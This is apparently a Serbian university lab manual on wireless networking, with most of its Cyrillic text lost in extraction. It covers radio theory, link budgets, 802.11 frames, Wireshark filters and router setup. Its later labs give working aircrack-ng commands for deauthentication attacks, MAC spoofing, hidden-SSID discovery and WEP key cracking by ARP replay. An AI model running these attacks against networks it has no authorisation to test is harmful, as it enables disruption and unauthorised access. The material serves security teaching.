Bks Prirucnik1 PDF
CIP
2012. 161 pp. ; 29 cm
ISBN 978-86-7982-142-3
COBISS.SR-ID 194074636
Contents
1. (p. 2)
1.1 (p. 2)
1.2 (p. 3)
1.3 (p. 10)
1.4 (p. 11)
1.5 (p. 21)
1.6 (p. 23)
1.7 (p. 24)
1.8 (p. 26)
1: (p. 28)
2. (p. 30)
2.1 (p. 30)
2.2 (p. 31)
2.3 (p. 41)
1: (p. 43)
2: (p. 44)
3. (p. 46)
3.1 (p. 46)
3.2 (p. 47)
3.3 LINUX (p. 47)
3.4 (p. 48)
3.5 (p. 49)
3.6 (p. 50)
3.7 (p. 54)
3.8 (p. 55)
4. (p. 58)
4.1 (p. 58)
4.2 (p. 58)
4.3 (p. 59)
4.4 (p. 60)
4.5 (p. 61)
4.6 (p. 62)
4.7 (p. 63)
4.8 MAC (p. 66)
5. (p. 70)
5.1 (p. 70)
5.2 BACKTRACK (p. 70)
1: BackTrack (p. 70)
2: (p. 70)
3: Linux (p. 71)
5.3 (p. 71)
4: (p. 72)
5.4 KISMET (p. 73)
5: Kismet (p. 74)
6: Kismet (p. 80)
5.5 WIRESHARK (p. 80)
5.6 (p. 80)
5.7 MAC (p. 81)
5.8 (p. 81)
5.9 (p. 82)
5.10 (p. 82)
7: (p. 83)
5.11 IEEE 802.11 (p. 84)
6. (p. 88)
6.1 (p. 88)
6.2 DOS (DENIAL-OF-SERVICE) (p. 89)
DoS (p. 90)
1: (p. 91)
2: (p. 92)
3: (p. 95)
6.3 (p. 95)
4: (p. 96)
6.4 MAC (p. 96)
5: (p. 97)
7. WEP (p. 100)
7.1 (p. 100)
7.2 WEP (p. 100)
7.3 (p. 101)
7.4 WEP (p. 103)
7.5 WEP (p. 105)
ARP (p. 106)
1: 64-bit WEP (p. 108)
2: 128-bit WEP (p. 109)
8. WPA/WPA2 (p. 112)
8.1 (p. 112)
8.2 WPA/WPA2 (p. 112)
WPA-PSK, WPA2-PSK (p. 112)
8.3 WPA-PSK, WPA2-PSK (p. 114)
1: WPA (p. 117)
8.4 WPA-PSK/WPA2-PSK (p. 117)
9. (p. 122)
9.1 (p. 122)
9.2 (p. 122)
9.3 (p. 123)
1: (p. 125)
2: (p. 125)
10. (p. 128)
10.1 (p. 128)
10.2 WPA/WPA2-ENTERPRISE (p. 131)
RADIUS (p. 139)
1: WPA2-Enterprise (p. 148)
11. MIKROTIK ROUTERS (p. 150)
11.1 MIKROTIK ROUTEROS (p. 150)
11.2 MIKROTIK (p. 150)
11.3 MIKROTIK (p. 152)
1: MikroTik (p. 159)
I
.
, , .
.
1.
1.1
.
,
,
.
.
1,
.
:
=
:
f ,
c ,
.
GSM 900MHz, 33cm.
, 2,4GHz,
12,5cm. , ,
.
, ,
:
, .
, .
, .
,
. FM .
88MHz 108MHz,
.
5m, 5mm,
. , 50m (
) .
.
1 ,
, ,
.
,
. ( ),
(
). , FM (88MHz -108 MHz)
, ( GSM 900MHz
1800MHz) . FM
GSM-, GSM .
( )
( , )
, (. QPSK, 8PSK).
1.2
,
. .
1.1 : ) )
.
( ) , 1.1,
(1 + 1 = 2).
2. ,
, 1.1,
(1 + (-1) = 0). 3.
,
RF4 ( ).
.
2 Constructive interference
3 Destructive interference
4 Radio Frequency
, ,
.
, .
.
, .
.
.
.
:
.
.
.
.
(
).
: ,
, , . -,
.
-.
- .
.
.
. ,
.
2,4GHz,
(
2,4GHz). -
.
- . o
.
. -
, .
- ( ) 5
. -
.
1.2 : ()
. ,
, .
, , ,
.
( 1.3) .
( 1.3) --
- .
1.3 : ) - )
5 Reflection
()
6( ).
.
1.4 :
,
, .
:
. , , ,
( 1.5). ,
.
( )
. ( 1.6).
6 Shadowing
1.5 :
.
, .
.
1.6 :
, ,
(7) . (
1.7). , , 10cm 20cm,
(, ,
...) .
7 Scattering
1.7 :
,
:
, ,
.
,
. 1.8
8 (
).
.
1.8 :
.
, 1.9.
1.9 :
,
.
.
.
. (
)
, ,
.
,
n/2, n .
60%
.
The radius of the n-th Fresnel zone at a point on the path is:
rn = sqrt( n · λ · d1 · d2 / (d1 + d2) )
where rn is the radius of the n-th Fresnel zone, λ the wavelength, and d1 and d2 the distances from that point to the two ends of the link.
10km, 2,4GHz.
17,66m. 28GHz,
5,17m. 60%
,
10,59m
.
6,36m.
1.10
. (
),
. 9 (
) .
, .
9 Multi-path propagation
. ,
,
.
10. GSM 16us
( ),
5km .
1.10 :
.
, ,
.
, .
, .
.
1.10
. .
, , e
.
. 20%
.
-
. ,
.
1.3
,
.
.
10 Delay spread
(dB).
. , ,
, , .
N = 10 log(P2 / P1) [dB]
where N is the ratio expressed in decibels and P1, P2 are the two powers being compared.
For example, if one power (P2) is 1W and the other (P1) is 0.5W, the difference is 3dB, since:
10 log(1 / 0,5) = 3,01
.
3dB 50%
. , 3dB 100%
.
Table 1.1 gives the power ratio P1/P2 for common dB values:
dB      P1/P2
3dB     2
10dB    10
20dB    100
30dB    1.000
40dB    10.000
50dB    100.000
60dB    1.000.000
Table 1.1: dB values and the corresponding power ratio
,
, . 1mW. dBm,
:
= 10
1
.
1.4
, .
.
, .
.
, :
, , , .
.
.
.
. ,
.
, dBi.
,
dBd. :
0dBd = 2,15dBi.
.
(elevation, E-plane) (azimuth, H-plane) .
,
.
1.11 .
1.11 :
,
() ,
. , ()
.
(). ,
.
.
. 1.12 .
1.12 : Yagi
. (. )
.
Marconi .
1.11 Yagi
.
. .
: ( 1.13), ( 1.13)
( 1.14).
.
.
.
1.13 : ) )
.
.
1.14 :
, .
.
.
.
1.2
.
, .
.
(. ).
-
0dB
20dB
3 dB
(45) 3 dB
20 dB
0 dB
3 dB
(45) 3 dB
( ) ( ) 20 dB
( ) ( ) 0 dB
( ) ( ) 0dB
1.2 : -
.
,
, , .
.
.
: () , , Yagi
.
2,2 dBi .
.
.
, 1.15.
1.15 : -
, 360
.
, , ,
.
,
.
Cisco AIR-ANT2485P-R 8,5dBi.
.
, 1.16.
1.16 :
1.17
.
1.17 : AIR-ANT2485P-R
.
AIR-ANT2485P-R 1.3.
Gain: 8.5 dBi
H-plane beamwidth: 66°
E-plane beamwidth: 56°
Connector: RP-TNC
Table 1.3: AIR-ANT2485P-R
Yagi .
Yagi-Uda, .
1.18.
.
1.18 : Yagi
1.19 : AIR-ANT1949
AIR-ANT1949 1.4.
Gain: 13.5 dBi
H-plane beamwidth: 30°
E-plane beamwidth: 25°
Connector: RP-TNC
Table 1.4: AIR-ANT1949
( 1.20) 100
. -
, . Cisco AIR-ANT3338
40km 2Mb/s.
54Mb/s 8km.
1.20 :
Gain: 21 dBi
H-plane beamwidth: 12°
E-plane beamwidth: 12°
Connector: RP-TNC
Table 1.5:
, ,
. ,
. .
( 1.21) .
1.21 :
20m,
18,
:
126m .
( 1.22).
1.22 :
=
( + )
15.
15 45m.
1.5
HF
(3MHz 30MHz). (), (),
( 1.23)
1.23 :
.
( ).
. . ,
() .
, .
11. , ,
(dB/m).
.
, . , ,
. ,
,
. :
. .
,
.
, .
.
. (30MHz
300MHz). .
RG58.
, CB12 ( , . -) VHF .
RG213. CB HF . RG-213
.
Heliax ( Foam) ,
. Heliax ( 1.24) ,
LMR . LMR400 ( 1.24) LMR600
Heliax .
11 Skin effect
12 Citizens' Band radio
,
.
1.6
, ,
. (
), , .
.
( ),
.
, .
1.25.
1.25 :
()
. . ,
(Transverse Magnetic), ,
. , (Transverse Electric),
,
. . 10, 11, .
, , .
( ). /2
. , Y ,
.
.
() ().
( )
, .
.
1.26 :
1.7
, , .
,
.
.
.
BNC 40- . BNC stands for Bayonet Neill-Concelman, after Paul Neill and Carl Concelman.
. BNC
( RG58 RG-179 RG-316).
GHz.
,
10Base2 .
1.27 BNC
B .
1.27 : BNC
1.28 : TNC
1.29 : N
1.30 : SMA
1.31 : SMB
MCX 80- .
SMB 30% .
6 GHz. 1.32 MCX
. (. pigtail),
.
1.32 : MCX
1.8
:
(dBm) = (dBm) + (dB) (dB)
: ,
, , ,
, .
,
:
PRX = PTX + GTX - LTX - LFS - LM + GRX - LRX
:
PRX (dBm),
PTX (dBm),
GTX (dBi),
LTX ( , ) (dB),
LFS (dB),
LM , , ... (dB),
GRX (dBi),
LRX ( , ) (dB).
The free-space path loss is:
LFS = 20 log(4 π d / λ)
where LFS is the free-space loss in dB, λ is the wavelength, and d is the distance (in the same units as λ).
:
= 32,45 [dB] + 20 log( [MHz]) + 20 log( [km])
= 27,55 [dB] + 20 log( [MHz]) + 20 log( [m])
= 36,6 [dB] + 20 log( [MHz]) + 20 log( [mile])
.
.
(dB) = (dBm) (dBm)
. 1.6
.
Availability (%)   Fade margin (dB)
90                 8
99                 18
99,9               28
99,99              38
99,999             48
Table 1.6: fade margin required for a given link availability
, .
.
.
Example:
Distance: 5 km
Frequency: 5,8 GHz
Equipment on both ends: transmit power 100 mW, receiver sensitivity -88 dBm, antenna gain 18 dBi, cable loss 2 dB
100mW corresponds to 20 dBm.
Free-space loss (with the frequency in MHz and the distance in km):
LFS = 32,45 + 20 log(5800) + 20 log(5) = 121,67 dB
Received power:
PRX = PTX + GTX - LTX - LFS + GRX - LRX
= 20 dBm + 18 dBi - 2 dB - 121,67 dB + 18 dBi - 2 dB
= -69,8 dBm
Against a receiver sensitivity of -88 dBm this leaves a fade margin of 18,2 dB,
which according to Table 1.6 corresponds to roughly 99% availability.
1:
50km. MikroTik RBSXTG-5HnD.
. 99%
.
II
.
.
RadioMobile -
-.
2.
2.1
,
.
-.
-, , -
, .
-,
.
RadioMobile. ,
.
Roger Coud,
13. RadioMobile online
,
.
RadioMobile :
20MHz 20GHz.
Longley-Rice ITS14-.
.
.
( ,
, , , ...).
- ( - ,
, ...).
RadioMobile .
- .
-.
13 http://www.cplus.org/rmw
14 International Telecommunications Society
2.2 -
-
- .
:
1. ,
2. ,
3. ,
4. -,
5. -,
6. - ,
7. .
RadioMobile
.
: SRTM15, DTED16, GTOPO3017, ...
(File/Map Properties).
2.1 :
( ),
. ( 2.1),
40004000 , 20
( 2.2).
2.2 :
Extract
( 2.3).
.
2.3 :
.
.
Google Maps, Yahoo Maps
.
Edit/Merge pictures.
Google Maps ( 2.4)
Operation, ,
. 2.5
Draw. .
2.5 :
.
(File/Network properties/Parameters)
( ), - ,
.
802.11g-TT, -
802.11g .
2400MHz 2495MHz ( 2.6).
2.6 :
(File/Network properties/Topology),
(master), (slave)
(). ( 2.7).
2.7 :
- (File/Network properties/System)
. - .
.
- ,
.
- Kosutnjak-Master,
2.8.
2.8 : -
:
: Arena-Klijent
: 100mW
O : -89dBm
: 0,4dB
: Yagi
: 26dBi
: 25m
-.
,
.
(File/Unit properties),
Toranj-Kosutnjak.
( 2.9).
2.9 :
Arena.
- a, -
e (File/Network properties/Membership). -
Kosutnjak-Master Toranj-Kosutnjak, -
Arena-Klijent Arena ( 2.10).
2.10 : -
- ,
(slave). -
2.10 Antenna direction
- a .
,
, - .
(Tools/Radio Link).
2.11.
2.11 :
.
. -
, .
:
Azimuth -
Elev. angle
Obstruction
Worst Fresnel
Distance
PathLoss dB
E field
RX level
RX Relative
Google Earth (Edit/Export to/Google Earth),
( 2.12).
2.3 -
-.
.
- Arena-Klijent
, 26dBi 19dBi
.
(Tools/Radio coverage/Single polar).
( 2.13).
- , -
Arena-Klijent. ( ,
),
-.
.
.
2.13 :
( Draw), 2.13
- . Yagi ,
.
2.14 :
1: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
50m.
.
:
:
TP-Link TA-2448 -
:
TL-WA801ND
0.5dB
?
?
, ?
2: -
Radio Mobile - 2.4GHz
. Radio Mobile- .
100km, 4000x4000 .
20m.
.
:
:
TP-Link TA-2448 -
TL-ANT2415D -
:
TL-WA801ND
1.5dB
?
?
, ?
III
.
.
, .
3.
3.1
I 802.11.
- 2,4GHz 5GHz.
, .
, , 1Mb/s
2Mb/s and FHSS (Frequency Hopping Spread Spectrum) DSSS (Direct
Sequence Spread Spectrum).
:
802.11a, 54 Mb/s, OFDM
5GHz (5,47GHz - 5,725GHz).
,
.
802.11b, 11 Mb/s, 802.11
2,4GHz , .
DSSS .
802.11g, 54Mb/s, OFDM 2,4GHz
. 802.11b b/g.
802.11n, 600 Mb/s. 2009.
. 802.11n MIMO (multiple-input and
multiple-output) , 2,4GHz, 5GHz,
Channel Bonding-, -
20MHz and 40MHz.
,
, .
,
.
3.2
802.11b 802.11g ,
14 22MHz.
. 11 ,
13 . 14. .
.
5MHz. ,
.
5 .
, 1, 6, 11.
3.1 : 2,4Ghz
3.3
Linux
Linux
() . A
(ethx),
( ath0 Atheros ).
MLME (MAC sublayer
management entity) ,
. Linux
API a ,
mac80211, , cfg80211.
. wlanx.
,
:
:
/:
:
iwconfig
:
?
( IEEE802.11?). ?
?
.
:
iwlist channel
:
?
?
?
,
.
3.4
,
E.
BSS (Basic Service Set) -
.
BSS.
( , ) (Extended Service Set).
(DS).
.
, DS .
(Access Point).
. .
, ,
. . ,
(Managed)
.
,
, .
. ,
, ,
,
.
(Independent - IBSS) Ad-Hoc .
(Ad-Hoc)
.
( AP, Managed, Ad-Hoc)
() (Monitor, rf-mon).
(. Wireshark,
Kismet).
.
Monitor .
Managed Ad-Hoc, AP
Monitor .
3.5
. , , CSMA/CD
. (CD) .
E .
IEEE 802.11 , , ,
, .
.
IEEE802.11 CSMA/CA (Collision Avoidance).
, .
,
,
CSMA/CA.
(Acknowledgement Frame).
, :
RTS CTS .
.
PS-Poll (Power Save Poll). IEEE 802.11
.
.
CF-End, CF-End+CF-ACK .
, .
DCF (Distributed Coordination
Function). (Carrier Sense),
, .
DCF,
(Contention Free).
PCF (Point Coordination Function).
DCF PCF
, CF-End, CF-End+CF-ACK
DCF.
:
Beacon .
Probe request () Probe response () ,
,
.
Authentication Deauthentication
.
Association, Disassociation, Reassociation
.
ATIM .
3.6
Wireshark, Monitor .
.
Wireshark, nefiltrirano.cap
, .
,
.
.
:
Statistics Wlan Traffic...
.
SSID (Service Set ID) ,
.
, labnet viser,
.
SSID .
BSSID (Basic Service Set ID).
BSSID . BSSID MAC .
Wireshark 24 (OUI).
ESSID (BSSID) Beacon
. .
.
.
Wireless Traffic. (File/Close) nefiltrirano.cap.
.
(File/Open) filtrirano.cap
1 2 (Beacon ):
.
(fixed parameters)
(tagged parameters).
.
:
Beacon ad-hoc BSS?
Beacon ?
SSID ?
?
?
(RSN18)?
WEP ,
, . WEP
IEEE 802.11-2007.
IEEE802.11i
. (Robust
Security Network - RSN) Beacon Probe Response
(RSN information Tagged parameters).
RSN information Beacon ( 32).
IEEE 802.11i
.
WPA WPA2 (Wi-Fi Protected Access).
IEEE 802.11i, WPA
WPA2, is .
WPA TKIP (Temporal Key Integrity Protocol) .
TKIP WEP,
. WEP -
.
WPA2 (Counter Mode with Cipher Block Chaining Message Authentication Code CCM)
. 802.11
RSN .
o
, IEEE 802.1x .
IEEE 802.1x
EAP19 ,
.
, .
WPA Enterprise WPA2 Enterprise,
.
, , (Pre
Shared Key - PSK). WPA Personal WPA2 Personal,
.
RSN (Robust Security
Network) IEEE802.11i,
WPA2 Enterprise.
802.1x (Request, Identity, Response, Identity).
?
Who?
EAP .
? ( 38)
:
.
EAP-Success . ( 80)
RSN (4-way handshake)
. . ( 82-88)
,
.
. DHCP
.
Wireshark:
, Flow Graph.
3.7 .
Beacon , Probe
(ESSID) ,
(BSS), .
Linux , Network Manager .
, iwlist.
:
iwlist scanning
labnet (ESSID: labnet)
MAC , (BSSID)?
Ad-Hoc ?
- ?
, , ?
?
?
?
3.8
,
. dBm, mW
1mW.
:
:
iwlist txpower
?
,
.
.
:
iwlist scanning
wavemon,
.
wavemon.
:
xterm
. xterm :
wavemon
:
.
.
.
. F2
, , /.
F2. .
.
IV
.
.
4.
4.1
,
. TP-Link
TP-Link WR841N.
,
, .
SOHO20 .
, ,
.
.
.
IP .
DHCP .
web
.
:
http://192.168.1.1
admin admin
4.2
IP 192.168.1.1, (
) , .
.
, . ,
Network, LAN 4.1.
4.1 : IP
4.3
Network, Wan, ,
( ).
4.2 : IP
4.2 .
4.4
.
.
4.3 : DHCP
DHCP (
, , DNS ).
(Default Gateway). DHCP Clients List,
, .
,
. ,
. FTP
,
. Address Reservation ,
MAC IP . 4.4
.
4.4 :
4.5
Forwarding.
4 , ,
Virtual Servers. 4.5 -
.
4.5 :
. , .
, (.
), .
, .
4.5, , IP ,
, . Forwarding,
DMZ (Demilitarized Zone). IP
.
,
, .
. 4.6
.
4.6 : IP
4.6
300Mbps.
4.7 :
(SSID), .
4.7
4.8 : WEP
WPA-PSK WPA2-PSK ,
.
. WPA2 SOHO
( 4.9):
Version WPA2-PSK.
Encryption AES.
PSK Password .
4.9 : WPA-PSK/WPA2-PSK
WPA/WPA2
,
. WPA-PSK/WPA2-PSK
, WPA/WPA2 . WPA/WPA2
WPA/WPA2 Enterprise ,
. RADIUS
.
WPA-PSK/WPA2-PSK WPA/WPA2 Enterprise
/, . 4.10
WPA/WPA2 Enterprise .
RADIUS .
4.8 MAC
MAC .
( )
( 4.11).
4.11 : MAC
4.12 :
:
Transmit Power - .
Beacon Interval -
.
RTS Threshold RTS/CTS
Fragmentation Threshold .
Wireless Statistics
( 4.13).
4.13 :
V
Linux -
Back Track, .
Kismet .
Wireshark .
5.
5.1
Linux
BackTrack. BackTrack is Ubuntu, Debian
Linux-a. ,
, .
KDE (K Desktop Environment) GNOME
,
. BackTrack
Auditor Security Linux WHAX ( Whoppix).
21,
BackTrack 5 R3 . BackTrack
, LiveDVD-a
USB .
5.2 BackTrack
1: BackTrack
BackTrack 5 R2 Linux .
2:
:
Start / System / Konsole
:
ifconfig
?
, ,
:
ifconfig -a
?
IP ?
(. wlan0)
:
21 http://www.backtrack-linux.org
ifconfig wlan0 up
:
ifconfig wlan0 down
IP . IP
DHCP .
.
DHCP , ,
, IP .
3: Linux
:
Start / System / Konsole
:
dhclient eth0
eth0
DHCP .
DHCP , :
ifconfig eth0
?
:
:
IP address: ifconfig <interface> <address> netmask <mask> (e.g. ifconfig eth0 10.0.0.100 netmask 255.0.0.0 or ifconfig eth0 10.0.0.100/8);
default gateway: route add default gw <gateway> (e.g. route add default gw 10.0.0.1);
route, with no arguments, prints the routing table;
DNS: edit resolv.conf in /etc with a Linux text editor (e.g. nano /etc/resolv.conf) and add the line nameserver 10.0.0.10; the DNS settings can be checked with cat /etc/resolv.conf.
5.3
(promiscuous) ,
,
Ad-hoc .
,
.
.
.
Ad-hoc . Windows
, Windows Vista Windows 7
Windows .
Windows . Linux
802.11 .
airmon-ng
. , (Managed)
. :
airmon-ng <start | stop> < > [. ]
airmon-ng <check | check kill>
start | stop ,
;
;
check airmon-ng ;
check kill ;
airmon-ng
.
4:
:
Start / System / Konsole
,
,
:
iwconfig
?
(IEEE802.11?). ?
?
:
airmon-ng start wlan0
,
:
iwconfig
mon0 .
:
airmon-ng stop mon0
, .
5.4 Kismet
5: Kismet
Kismet BackTrack Linux- :
Start / Backtrack / Radio Network Analysis / 80211 / All / Kismet
kismet, Enter.
( 5.1).
5.1 : Kismet
, .
wlan0 [Add],
( 5.2).
5.2 :
.
5.3 .
5.3 : Kismet
. autofit
.
Sort ( 5.4).
5.4 :
.
?
,
.
,
. 5.5 .
5.5 :
.
. Kismet
. kismet_ui.conf ,
decay 3 .
!,
( 3 ), 5.5
HiHaHo;
..
( 6 ), 5.5
energetics;
.
( 6 ),
5.5 rakac.
(SSID) .
Beacon (. SSID-a cloaking SSID),
, <no ssid> .
:
A (Access Point) .
D (Data Network)
.
H (Ad-hoc) Ad-hoc .
P (Probe Request) .
Ch :
802.11b/g , 1-13 (1-14 );
802.11a , 36, 40, 44, 48, 52, 56, 60, 64, 149, 153, 157 and 161.
Pkts .
Size .
, Kismet
.
. :
WEP WPA
.
.
.
(SSID).
.
5.6.
Enter i.
5.6 :
Kismet .
Client list
Windows . 5.7.
5.7 :
/
Channel details Windows .
5.8 .
5.8 : /
Kismet .
()
. Configure channel
Kismet ( 5.9)
.
(dwell ).
5.9 :
. .
dump Wireshark.
6: Kismet
Kismet .
.
?
.
.
viser labnet.
.
?
.
/ .
Wireshark.
5.5 Wireshark
.
Wireshark - (Capture filters)
- (Display Filters). -
.
. Wireshark
IEEE 802.11 , 802.11
( ).
5.6
(BSSID). BSSID MAC .
,
.
,
.
:
wlan.bssid eq <MAC >
5.7 MAC
( MAC 00:09:5b:e8:c4:03):
wlan.sa eq 00:09:5b:e8:c4:03
MAC ipconfig/all getmac ( Windows
), ifconfig ( Linux ).
, :
wlan.bssid eq 00:11:92:6e:cf:00 and wlan.sa eq 00:09:5b:e8:c4:03
5.8
.
type subtype IEEE 802.11 .
Wireshark Beacon ,
Beacon .
Control frame subtypes:
10  PS-Poll (Power Save Poll)
11  RTS (Request to Send)
12  CTS (Clear to Send)
13  ACK
14  CF-End
15  CF-End + CF-Ack
Table 5.1: control frame subtypes
Management frame subtypes:
0   Association request
1   Association response
2   Reassociation request
3   Reassociation response
4   Probe request
5   Probe response
8   Beacon
10  Disassociation
11  Authentication
12  Deauthentication
Table 5.2: management frame subtypes
Beacon (type=00),
8 (subtype=00).
:
!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8)
()
Beacon .
, Wireshark
type subtype .
Beacon .
:
wlan.fc.type_subtype ne 8
5.3 .
5.9
Beacon
, .
.
:
wlan.fc.type_subtype eq 32
:
wlan.fc.type eq 2
, ICMP (ping), NULL
, ...
5.10
( ).
. IEEE 802.11
protected bit 1,
(WEP,TKIP CCMP).
:
wlan.fc.protected ne 1
.
:
wlan.fc.protected ne 1 and wlan.fc.type eq 2
7:
Wireshark .
.
300 .
.
Frame type and the matching display filter:
Management frames: wlan.fc.type eq 0
Control frames: wlan.fc.type eq 1
Data frames: wlan.fc.type eq 2
Association request: wlan.fc.type_subtype eq 0
Association response: wlan.fc.type_subtype eq 1
Reassociation request: wlan.fc.type_subtype eq 2
Reassociation response: wlan.fc.type_subtype eq 3
Probe request: wlan.fc.type_subtype eq 4
Probe response: wlan.fc.type_subtype eq 5
Beacon: wlan.fc.type_subtype eq 8
Announcement traffic indication map (ATIM): wlan.fc.type_subtype eq 9
Disassociate: wlan.fc.type_subtype eq 10
Authentication: wlan.fc.type_subtype eq 11
Deauthentication: wlan.fc.type_subtype eq 12
Action frames: wlan.fc.type_subtype eq 13
Block ACK Request: wlan.fc.type_subtype eq 24
Block ACK: wlan.fc.type_subtype eq 25
Power-Save Poll: wlan.fc.type_subtype eq 26
Request to Send: wlan.fc.type_subtype eq 27
Clear to Send: wlan.fc.type_subtype eq 28
ACK: wlan.fc.type_subtype eq 29
Contention Free Period End: wlan.fc.type_subtype eq 30
Contention Free Period End ACK: wlan.fc.type_subtype eq 31
Data + Contention Free ACK: wlan.fc.type_subtype eq 33
Data + Contention Free Poll: wlan.fc.type_subtype eq 34
Data + Contention Free ACK + Contention Free Poll: wlan.fc.type_subtype eq 35
NULL Data: wlan.fc.type_subtype eq 36
NULL Data + Contention Free ACK: wlan.fc.type_subtype eq 37
NULL Data + Contention Free Poll: wlan.fc.type_subtype eq 38
NULL Data + Contention Free ACK + Contention Free Poll: wlan.fc.type_subtype eq 39
QoS Data: wlan.fc.type_subtype eq 40
QoS Data + Contention Free ACK: wlan.fc.type_subtype eq 41
QoS Data + Contention Free Poll: wlan.fc.type_subtype eq 42
QoS Data + Contention Free ACK + Contention Free Poll: wlan.fc.type_subtype eq 43
NULL QoS Data: wlan.fc.type_subtype eq 44
802.11 .
5.4 , Wireshark
.
Type: wlan.fc.type
Subtype: wlan.fc.subtype (beacon frame, authenticate request, disassociate
Retry: wlan.fc.retry
Power Management: wlan.fc.pwrmgmt
More Data: wlan.fc.moredata
Protected: wlan.fc.protected
Order: wlan.fc.order
Duration: wlan.duration
VI
. ,
, .
6.
6.1
. IEEE 802.11 ,
:
.
.
.
.
,
.
.
. -
. ,
.
. , 802.11, "" .
, .
.
, .
:
,
.
(poor configuration) .
. ,
.
(poor encryption).
.
.
,
.
DoS ,
.
, DoS .
OSI
. ,
, .
.
,
.
, .
.
.
jamming-to-signal (J/S), ,
.
,
. ,
, .
J/S , ,
:
:
Pj - ,
Pt - ,
Gjr - - ,
Grj - - ,
Grt - - ,
Gtr - - ,
Br - ,
Bj - ,
Rtr - ,
Rjr - ,
Lj - ,
Lr - .
ERP (Effective Radiated Power) ,
, .
, ,
, . ,
.
.
,
.
WLAN ,
, , ,
. , WLAN ,
. WLAN
.
. ,
,
. , ,
.
OSI
.
DoS
,
.
. ,
(.
), .
802.11 ,
( ).
DoS .
,
MAC .
, ()
.
, ,
.
DoS :
(cloaked SSID);
WPA/WPA2 ;
ARP , WEP . Windows
ARP 22.
22 disconnect
,
.
aireplay-ng.
,
(injection)
. aireplay-ng.
1:
.
:
:
Start / System / Konsole
:
airmon-ng start wlan0
:
iwconfig
, :
aireplay-ng
.
,
aireplay-ng -9 mon0
- -9 aireplay-ng ,
- mon0 .
, :
16:29:41 mon0 channel: 9
16:29:41 Trying broadcast probe requests...
16:29:41 Injection is working!
16:29:42 Found 5 APs
,
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D mon0
:
-0
aireplay-ng ;
1 . 0,
;
-a 00:14:6C:7E:40:80 MAC ;
-c 00:0F:B5:AE:CE:9D MAC
, ;
mon0 .
:
10:01:45 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1
10:01:45 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
aireplay-ng ,
aireplay-ng 128 .
64 . [61 | 63 ACKs],
:
[ ACK | ACK
];
1
, ;
.
,
.
MA ,
, Kismet airodump-ng.
2:
.
:
- SSID spec_lab1 (, spec_lab2, spec_lab3, ...)
- 1 ( 6, 11, ...)
- :
- IP : 172.17.32.100/24
- Default gateway: 172.17.32.1/24
- DNS : 172.16.1.13
1
Manager .
:
airmon-ng stop mon0
:
iwconfig wlan0 essid <SSID>
wlan0 DHCP :
dhclient wlan0
.
,
:
ping <IP >
2 .
airodump-ng .
airodump-ng mon0
Wireshark mon0 .
MAC :
aireplay-ng -0 1 -a < > -c < > mon0
.
?
802.11 ,
SN. SN 12 .
SN .
, 4095.
. 6.1 SN (599, 600, 601 602).
6.1 : SN
6.2 45 46.
, (
23 - ). SN
MAC .
44 47, SN 637 638, .
MAC
SN 1957 1958, .
23 Broadcast
6.2 :
, .
SN 24.
3:
Wireshark .
6.3
. 25.
(SSID) beacon ,
Probe .
, .
, SSID beacon ,
. ,
, association
4:
SSID Beacon (
IV ).
SSID .
.
.
Wireshark mon0 .
MAC .
, Probe request
.
SSID .
Which SSID?
6.4 MAC
MAC .
MAC .
MAC 26 is /
. MAC ROM
. , RAM ,
RAM .
MAC
RAM , .
. MAC
.
5:
(
IV ).
.
MAC
.
MAC :
ifconfig wlan0 down
:
ifconfig wlan0 hw ether <MAC >
:
ifconfig wlan0 up
:
iwconfig wlan0 essid <SSID >
wlan0 DHCP :
dhclient wlan0
.
?
Windows MAC
, NetworkAddress
( 6.3).
VII
WEP
.
WEP
.
, .
7. WEP
7.1
.
802.11,
WEP27. , WEP
.
.
IEEE 802.11 WEP
. WEP
,
.
7.2 WEP
. IEEE 802.11 W :
,
.
. ANY SSID
.
hot-spots.
7.1 :
7.1 :
1. .
2. .
3. .
WEP .
, 7.2:
1. .
2. 128-
.
3.
.
4. .
5. ,
.
, ,
.
7.2 :
. ,
.
.
7.3
WEP RC4
IV.
XOR ( )
:
C = [ M || ICV(M) ] ⊕ [ RC4(K || IV) ]
:
,
,
ICV(M) ,
,
,
IV - ,
|| - .
7.3 : WEP
IV WEP-,
. , 24 , 2^24
. ,
IV ( ) 99%
12000 . 1 54Mb/s,
12000 .
, 7. 3, IV (
) WEP .
IV .
7.4 WEP
WEP IV
.
Windows WEP
:
1. (Control panel)
.
2. (Properties).
7.4 :
3. ( 7.4)
(Add).
4. SSID, WEP (
7.5).
7.5 :
Linux WEP
:
1. .
2. iwconfig ( 7.6).
7.6 : iwconfig
3. o WEP
ESSID WEP .
:
dhclient wlan0
7.5 WEP
WEP :
.
.
.
, , . IV-,
, , .
, , .
WEP Aircrack-ng .
aireplay-ng WEP
:
,
ARP ,
KoreK-chopchop ,
,
Cafe-latte.
ARP
WEP .
aireplay-ng 29.
ARP
IV
.
. ARP ,
, . ARP
broadcast (FF:FF:FF:FF:FF:FF) 68 . ARP
ARP ,
IV.
:
airodump-ng WEP
,
;
aireplay-ng ARP
;
aircrack-ng IV WEP .
:
:
airmon-ng start wlan0
airodump-ng
WEP :
airodump-ng mon0
29 http://www.aircrack-ng.org/doku.php?id=aireplay-ng
7.7 : WEP
, :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w snimak mon0
:
-c 9 ,
--bssid 00:14:6C:7E:40:80 ,
-w snimak .
aireplay-ng .
aireplay-ng ARP
. :
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
:
-3 ,
-b 00:14:6C:7E:40:80 - ,
-h 00:0F:B5:88:AC:82 - .
ARP
:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
, airodump-ng
, (
7.8).
7.8 : airodump-ng
( 20,000 64-
40,000 128- ) aircrack-ng
WEP :
aircrack-ng -b 00:14:6C:7E:40:80 snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
snimak*.cap .
(7.9):
7.9 : aircrack-ng
1: 64- WEP
WEP .
64- : password WEP .
.
WEP .
.
2: 128- WEP
WEP .
128- : password WEP .
.
WEP .
.
VIII
WPA/WPA2
.
IEEE 802.11i
.
,
.
